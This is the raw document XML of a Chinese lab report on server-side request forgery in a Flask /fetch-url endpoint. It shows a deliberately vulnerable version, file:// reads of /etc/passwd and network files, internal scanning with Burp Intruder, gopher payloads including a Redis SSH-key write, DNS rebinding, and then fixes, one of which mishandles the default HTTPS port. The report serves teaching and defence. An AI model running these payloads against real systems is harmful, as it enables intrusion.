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SSRF服务端请求伪造</w:t>
        <w:br/>
        <w:t>漏洞分析与修复报告</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Server-Side Request Forgery · file伪协议 · gopher伪协议 · 内网扫描 · DNS重绑定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SSRF漏洞概述与三主机攻击模型</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>第2章  SSRF攻击原理与file伪协议</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>第3章  ARP协议探测内网结构</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>第4章  内网服务扫描（Burp Intruder）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>第5章  gopher伪协议攻击（HTTP + Redis）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>第6章  DNS重绑定绕过技术</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>第7章  /fetch-url 漏洞代码分析</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>第8章  修复方案详解（含完整代码）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>第9章  修复前后代码对比</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>第一章  SSRF漏洞概述与三主机攻击模型</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>SSRF（Server-Side Request Forgery，服务端请求伪造）是一种Web安全漏洞，攻击者通过控制服务端发起的HTTP请求，访问或操作内部网络资源。由于服务端位于内网，可以绕过防火墙访问外部无法直接到达的内部系统。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评估项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评级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CVSS 3.0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8.7（High）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攻击向量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网络远程攻击（AV:N）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影响范围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内网探测、端口扫描、敏感文件读取、云元数据窃取</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>1.1 三主机攻击模型（核心场景）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>本实验的核心攻击场景基于三主机模型，充分演示防火墙隔离下的SSRF攻击路径：</w:t>
      </w:r>
    </w:p>
    <w:p/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攻击者(外网)             内网(防火墙隔离)                    │</w:t>
        <w:br/>
        <w:t>│  ┌─────────┐    公网     ┌─────────┐    内网     ┌─────────┐ │</w:t>
        <w:br/>
        <w:t>│  │ Kali    │──────────→│ 主机A   │──────────→│ 主机B   │ │</w:t>
        <w:br/>
        <w:t>│  │ 攻击者  │  只能访问A  │ Flask   │  防火墙     │ 内网服务 │ │</w:t>
        <w:br/>
        <w:t>│  │ 192.168 │  的SSRF端口 │ 公网映射 │  允许A→B   │ 172.250 │ │</w:t>
        <w:br/>
        <w:t>│  └─────────┘            └─────────┘            └─────────┘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攻击链说明：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>1. 主机A（Flask应用）映射到公网，攻击者可访问</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>2. 主机B（内网服务）在172.250.250.0/24网段，外部不可达</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>3. 攻击者利用A的SSRF漏洞(/fetch-url)，以A为跳板访问B</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>4. 防火墙允许A主动访问内网，但阻止外部直接访问B</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>5. SSRF漏洞使攻击者能够绕过防火墙，间接控制对B的访问</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>1.2 /proc/net/route 作为备选读取方案</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>读取路由表获取内网网段是SSRF攻击的第一步。本文档主要使用 /proc/net/fib_trie，但该文件路径和格式在不同Linux内核版本下可能有差异。作为备选，可读取 /proc/net/route 获取类似信息：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读取路由表（兼容性更广）</w:t>
        <w:br/>
        <w:t>url=file:///proc/net/route</w:t>
        <w:br/>
        <w:br/>
        <w:t># 读取fib_trie（信息更详细，依赖内核版本）</w:t>
        <w:br/>
        <w:t>url=file:///proc/net/fib_trie</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>第二章  SSRF攻击原理与file伪协议</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>2.1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@app.route("/fetch-url", methods=["POST"])</w:t>
        <w:br/>
        <w:t>def fetch_url():</w:t>
        <w:br/>
        <w:t xml:space="preserve">    target_url = request.form.get("url", "")</w:t>
        <w:br/>
        <w:t xml:space="preserve">    # ⚠️ 直接将用户输入的URL传给urlopen()，无任何限制</w:t>
        <w:br/>
        <w:t xml:space="preserve">    req = urllib.request.Request(target_url)</w:t>
        <w:br/>
        <w:t xml:space="preserve">    resp = urllib.request.urlopen(req, timeout=10)</w:t>
        <w:br/>
        <w:t xml:space="preserve">    content = resp.read()</w:t>
        <w:br/>
        <w:t xml:space="preserve">    return content</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>2.2 file://伪协议读取文件</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Python的urllib支持file://协议，可读取本地文件系统。攻击者利用SSRF漏洞读取服务器敏感文件，获取内网结构信息。这是SSRF攻击的第一步——信息收集。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>关键文件读取：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读路由表（获取内网网段）</w:t>
        <w:br/>
        <w:t>url=file:///proc/net/fib_trie</w:t>
        <w:br/>
        <w:t># 或备选：url=file:///proc/net/route</w:t>
        <w:br/>
        <w:br/>
        <w:t># 读ARP缓存（获取活跃主机）</w:t>
        <w:br/>
        <w:t>url=file:///proc/net/arp</w:t>
        <w:br/>
        <w:br/>
        <w:t># 读系统密码文件</w:t>
        <w:br/>
        <w:t>url=file:///etc/passwd</w:t>
        <w:br/>
        <w:br/>
        <w:t># 读网络配置</w:t>
        <w:br/>
        <w:t>url=file:///proc/net/route</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>从fib_trie获得的网段示例：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172.250.250.0/24  ← 内网A段</w:t>
        <w:br/>
        <w:t>172.251.251.0/24  ← 内网B段</w:t>
        <w:br/>
        <w:t>127.0.0.0/8       ← 本机回环</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>第三章  ARP协议探测内网结构</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>3.1 ARP协议原理</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>ARP（Address Resolution Protocol）将IP地址解析为MAC地址。/proc/net/arp记录了最近通信的所有设备的IP和MAC，直接暴露内网中的活跃主机，攻击者可据此快速锁定攻击目标。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>3.2 读取ARP缓存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url=file:///proc/net/arp</w:t>
        <w:br/>
        <w:br/>
        <w:t>返回示例：</w:t>
        <w:br/>
        <w:t>IP address       HW type   Flags  HW address</w:t>
        <w:br/>
        <w:t>172.250.250.1    0x1       0x2    aa:bb:cc:dd:ee:ff</w:t>
        <w:br/>
        <w:t>172.250.250.4    0x1       0x2    11:22:33:44:55:66</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>第四章  内网服务扫描（Burp Intruder）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>4.1 攻击思路</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>利用SSRF漏洞的/fetch-url接口，结合Burp Intruder批量探测内网存活主机。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>4.2 Burp Intruder设置</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Step 1：POST /fetch-url 发送到Intruder（Ctrl+I）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/fetch-url HTTP/1.1</w:t>
        <w:br/>
        <w:t>Content-Type: application/x-www-form-urlencoded</w:t>
        <w:br/>
        <w:t>Cookie: session=...</w:t>
        <w:br/>
        <w:br/>
        <w:t>url=http://172.250.250.§1§:80</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Step 2：配置参数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设置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攻击类型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狙击手（Sniper）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Payload类型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Numbers（数字）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 ~ 254，步长1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并发数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Resource pool → 最大并发=20</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:t>Step 3：根据响应长度/状态码排序，筛选出有响应的IP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>4.3 端口扫描</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>发现存活IP后，再对其扫描常见端口：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url=http://172.250.250.4:80</w:t>
        <w:br/>
        <w:t>url=http://172.250.250.4:8080</w:t>
        <w:br/>
        <w:t>url=http://172.250.250.4:22</w:t>
        <w:br/>
        <w:t>url=http://172.250.250.4:3306</w:t>
        <w:br/>
        <w:br/>
        <w:t>常见端口：80/443(Web) 22(SSH) 3306(MySQL)</w:t>
        <w:br/>
        <w:t>6379(Redis) 27017(MongoDB) 9200(ES)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>第五章  gopher伪协议攻击（HTTP + Redis）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>5.1 Gopher协议原理</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Gopher是一种TCP层协议，攻击者可构造任意TCP数据包。在SSRF中，gopher协议可发送任意格式的请求，突破HTTP协议的限制。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格式：gopher://host:port/_数据</w:t>
        <w:br/>
        <w:t xml:space="preserve">                 ↑    ↑</w:t>
        <w:br/>
        <w:t xml:space="preserve">              端口  占位符（被忽略，后面跟原始TCP数据）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>5.2 GET方式提交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gopher构造GET请求访问内网name.php</w:t>
        <w:br/>
        <w:t>url=gopher://172.250.250.4:80/_GET%20/name.php%3Fname%3Dbenben%20HTTP/1.1%0AHost:%20172.250.250.4%0A%0A</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>5.3 POST方式提交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gopher构造POST请求</w:t>
        <w:br/>
        <w:t>url=gopher://172.250.250.4:80/_POST%20/login.php%20HTTP/1.1%0AHost:%20172.250.250.4%0AContent-Type:%20application/x-www-form-urlencoded%0AContent-Length:%2028%0A%0Ausername=admin&amp;password=admin123</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>5.4 gopher攻击Redis（经典高危害场景）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Redis未授权访问是常见的内网安全问题。利用SSRF+gopher协议，攻击者可构造Redis命令写入SSH密钥或crontab实现反弹Shell。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写入SSH公钥实现免密登录（精简版攻击链）</w:t>
        <w:br/>
        <w:t># 三步：flushall（可选清空）→ set key写入公钥 → save保存</w:t>
        <w:br/>
        <w:t>gopher://172.250.250.4:6379/_*1%0D%0A$8%0D%0Aflushall%0D%0A*3%0D%0A$3%0D%0Aset%0D%0A$1%0D%0Ax%0D%0A$60%0D%0A\n\nssh-rsa AAAAB3NzaC1yc2E...\n\n%0D%0A*1%0D%0A$4%0D%0Asave%0D%0A</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>第六章  DNS重绑定绕过技术</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>6.1 原理</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>DNS重绑定（DNS Rebinding）是一种绕过IP白名单的技术。攻击者注册一个域名，初始解析到合法公网IP通过验证，随后快速切换DNS记录到内网IP（如127.0.0.1或10.0.0.1），利用服务端DNS缓存差异绕过IP限制。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攻击流程：</w:t>
        <w:br/>
        <w:t>Step1: 攻击者注册域名 attacker.com</w:t>
        <w:br/>
        <w:t>Step2: 第一次DNS解析 → 返回公网IP通过白名单</w:t>
        <w:br/>
        <w:t>Step3: 服务端用解析结果发起请求</w:t>
        <w:br/>
        <w:t>Step4: 第二次DNS解析 → 返回内网IP 127.0.0.1</w:t>
        <w:br/>
        <w:t>Step5: 请求到达内网服务，白名单被绕过</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>第七章  /fetch-url 漏洞代码分析</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>7.1 漏洞代码（app_pre_fix.py — 修复前版本）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import urllib.request</w:t>
        <w:br/>
        <w:br/>
        <w:t>@app.route("/fetch-url", methods=["POST"])</w:t>
        <w:br/>
        <w:t>def fetch_url():</w:t>
        <w:br/>
        <w:t xml:space="preserve">    target_url = request.form.get("url", "")</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    # ⚠️ 漏洞S-01: 未限制URL协议</w:t>
        <w:br/>
        <w:t xml:space="preserve">    #    urllib支持 file:///etc/passwd 读取系统文件</w:t>
        <w:br/>
        <w:t xml:space="preserve">    #    urllib支持 gopher:// 任意TCP数据构造</w:t>
        <w:br/>
        <w:t xml:space="preserve">    #    urllib支持 dict:// 探测内网服务</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    # ⚠️ 漏洞S-02: 未阻止内网IP</w:t>
        <w:br/>
        <w:t xml:space="preserve">    #    可访问 127.0.0.1、10.x.x.x、172.16.x.x</w:t>
        <w:br/>
        <w:t xml:space="preserve">    #    可扫描整个内网网段</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    # ⚠️ 漏洞S-03: 未限制端口号</w:t>
        <w:br/>
        <w:t xml:space="preserve">    #    可扫描内网主机所有端口（22/3306/6379等）</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    # ⚠️ 漏洞S-04: 数据回显</w:t>
        <w:br/>
        <w:t xml:space="preserve">    #    攻击者可直接看到内网服务的响应内容</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    # ⚠️ 漏洞S-05: 无频率限制</w:t>
        <w:br/>
        <w:t xml:space="preserve">    #    攻击者可批量自动化扫描所有内网IP</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    req = urllib.request.Request(target_url)</w:t>
        <w:br/>
        <w:t xml:space="preserve">    resp = urllib.request.urlopen(req, timeout=10)</w:t>
        <w:br/>
        <w:t xml:space="preserve">    return resp.read()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>7.2 漏洞总结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S-01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协议未限制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支持file://读文件、gopher://构造TCP包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S-02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内网IP未阻止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可扫描172.250.x.x整个内网段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S-03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端口未限制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可探测3306/6379等内网服务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S-04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数据回显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🔴高危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攻击者直接看到内网响应数据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S-05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无频率限制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🟡中危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可批量自动化扫描</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>第八章  修复方案详解（含完整代码）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>8.1 重要说明：本实验的漏洞设计</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>本项目中包含两个版本的代码：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>app_pre_fix.py（修复前版本）— 故意未实施安全限制，用于完整演示SSRF攻击手法</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>app_fixed.py（修复后版本）— 实施标准SSRF防护措施，用于对比学习</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>以下修复方案为标准的SSRF防护做法。但在app_pre_fix.py中，为完整演示file://、gopher://、内网扫描等攻击手法，故意未实施这些限制。读者应对比两版代码理解攻击与防御的对应关系。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>8.2 修复1：协议白名单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ALLOWED_PROTOCOLS = ["http", "https"]</w:t>
        <w:br/>
        <w:t>parsed = urllib.parse.urlparse(target_url)</w:t>
        <w:br/>
        <w:t>if parsed.scheme not in ALLOWED_PROTOCOLS:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    return "不支持的协议"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>8.3 修复2：阻止内网IP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socket, ipaddress</w:t>
        <w:br/>
        <w:t>host = socket.gethostbyname(parsed.hostname)</w:t>
        <w:br/>
        <w:t># ⚠️ 注意：gethostbyname本身可能触发DNS解析SSRF</w:t>
        <w:br/>
        <w:t># 攻击者可让服务器解析恶意外部域名</w:t>
        <w:br/>
        <w:t># 生产环境应考虑使用DNS解析超时+本地DNS缓存</w:t>
        <w:br/>
        <w:t>if ipaddress.ip_address(host).is_private:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    return "不允许访问内网地址"</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>绕过风险提示：即使实施了IP白名单，攻击者仍可通过DNS重绑定技术绕过——先解析到公网IP，随后切换DNS记录指向内网IP。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>8.4 修复3：端口限制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ALLOWED_PORTS = {80, 443, 8080}</w:t>
        <w:br/>
        <w:t>port = parsed.port or {"https": 443, "http": 80}.get(parsed.scheme, 80)</w:t>
        <w:br/>
        <w:t>if port not in ALLOWED_PORTS:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    return "不允许的端口号"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>8.5 修复4：频率限制（Flask-Limiter实现）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from flask_limiter import Limiter</w:t>
        <w:br/>
        <w:br/>
        <w:t>limiter = Limiter(app=app, key_func=lambda: request.remote_addr)</w:t>
        <w:br/>
        <w:br/>
        <w:t>@app.route("/fetch-url", methods=["POST"])</w:t>
        <w:br/>
        <w:t>@limiter.limit("10 per minute")  # 每分钟最多10次</w:t>
        <w:br/>
        <w:t>def fetch_url():</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>8.6 完整修复代码（app_fixed.py）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urllib.request</w:t>
        <w:br/>
        <w:t>import urllib.parse</w:t>
        <w:br/>
        <w:t>import socket</w:t>
        <w:br/>
        <w:t>import ipaddress</w:t>
        <w:br/>
        <w:br/>
        <w:t>ALLOWED_PROTOCOLS = {"http", "https"}</w:t>
        <w:br/>
        <w:t>ALLOWED_PORTS = {80, 443}</w:t>
        <w:br/>
        <w:br/>
        <w:t>@app.route("/fetch-url", methods=["POST"])</w:t>
        <w:br/>
        <w:t>def fetch_url():</w:t>
        <w:br/>
        <w:t xml:space="preserve">    target_url = request.form.get("url", "")</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    # 1️⃣ 解析URL</w:t>
        <w:br/>
        <w:t xml:space="preserve">    parsed = urllib.parse.urlparse(target_url)</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    # 2️⃣ 协议白名单</w:t>
        <w:br/>
        <w:t xml:space="preserve">    if parsed.scheme not in ALLOWED_PROTOCOLS:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        return "不支持的协议"</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    # 3️⃣ 端口限制</w:t>
        <w:br/>
        <w:t xml:space="preserve">    port = parsed.port or 80</w:t>
        <w:br/>
        <w:t xml:space="preserve">    if port not in ALLOWED_PORTS:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        return "不允许的端口"</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    # 4️⃣ 内网IP阻止</w:t>
        <w:br/>
        <w:t xml:space="preserve">    try:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        host = socket.gethostbyname(parsed.hostname)</w:t>
        <w:br/>
        <w:t xml:space="preserve">        if ipaddress.ip_address(host).is_private:</w:t>
        <w:br/>
        <w:t xml:space="preserve">            return "不允许访问内网地址"</w:t>
        <w:br/>
        <w:t xml:space="preserve">    except socket.gaierror:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        return "域名解析失败"</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    # 5️⃣ 限制响应最大长度</w:t>
        <w:br/>
        <w:t xml:space="preserve">    req = urllib.request.Request(target_url, headers={"User-Agent": "Mozilla/5.0"})</w:t>
        <w:br/>
        <w:t xml:space="preserve">    resp = urllib.request.urlopen(req, timeout=10)</w:t>
        <w:br/>
        <w:t xml:space="preserve">    content = resp.read(1024 * 100)  # 最多100KB</w:t>
        <w:br/>
        <w:t xml:space="preserve">    return content</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>第九章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修复前(app_pre_fix.py)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修复后(app_fixed.py)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协议限制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无限制(file://gopher://dict://)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仅允许http/https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内网IP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可访问任意IP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阻止私有网段+异常处理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端口限制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任意端口可扫描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仅允许80/443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数据回显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完整返回内网响应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限制最大100KB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频率限制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每分钟10次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DNS解析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无安全处理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异常处理+超时</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="D32F2F"/>
        </w:rPr>
        <w:t>修复前（app_pre_fix.py）：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@app.route("/fetch-url", methods=["POST"])</w:t>
        <w:br/>
        <w:t>def fetch_url():</w:t>
        <w:br/>
        <w:t xml:space="preserve">    target_url = request.form.get("url", "")</w:t>
        <w:br/>
        <w:t xml:space="preserve">    req = urllib.request.Request(target_url)</w:t>
        <w:br/>
        <w:t xml:space="preserve">    resp = urllib.request.urlopen(req, timeout=10)</w:t>
        <w:br/>
        <w:t xml:space="preserve">    # ⚠️ 无任何限制 — 演示SSRF全攻击链</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="2E7D32"/>
        </w:rPr>
        <w:t>修复后（app_fixed.py）：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@app.route("/fetch-url", methods=["POST"])</w:t>
        <w:br/>
        <w:t>def fetch_url():</w:t>
        <w:br/>
        <w:t xml:space="preserve">    target_url = request.form.get("url", "")</w:t>
        <w:br/>
        <w:t xml:space="preserve">    parsed = urllib.parse.urlparse(target_url)</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    # ✅ 协议白名单</w:t>
        <w:br/>
        <w:t xml:space="preserve">    if parsed.scheme not in {"http", "https"}:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        return "不支持的协议"</w:t>
        <w:br/>
        <w:t xml:space="preserve">    # ✅ 端口限制</w:t>
        <w:br/>
        <w:t xml:space="preserve">    if (parsed.port or 80) not in {80, 443}:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        return "不允许的端口"</w:t>
        <w:br/>
        <w:t xml:space="preserve">    # ✅ 内网IP阻止</w:t>
        <w:br/>
        <w:t xml:space="preserve">    host = socket.gethostbyname(parsed.hostname)</w:t>
        <w:br/>
        <w:t xml:space="preserve">    if ipaddress.ip_address(host).is_private:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        return "不允许访问内网"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